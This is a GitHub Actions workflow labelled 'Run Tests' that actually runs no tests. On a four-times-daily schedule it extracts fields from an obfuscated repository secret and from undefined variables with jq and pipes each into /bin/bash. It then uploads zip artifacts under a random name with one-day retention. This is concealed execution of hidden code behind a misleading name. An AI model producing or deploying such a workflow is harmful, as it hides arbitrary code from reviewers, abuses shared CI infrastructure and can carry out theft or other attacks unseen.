name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '37 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          tu03027: ${{ secrets.tu03027 }}
        run: |
          printf '%s' "$tu03027" | jq -r .copib37640 | /bin/bash
          echo $xssyf84 | jq -r .bpjr64 | /bin/bash
          printf '%s' "$e74" | jq -r .jonao22 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: uyPJXzFc
          path: "*.zip"
          retention-days: 1
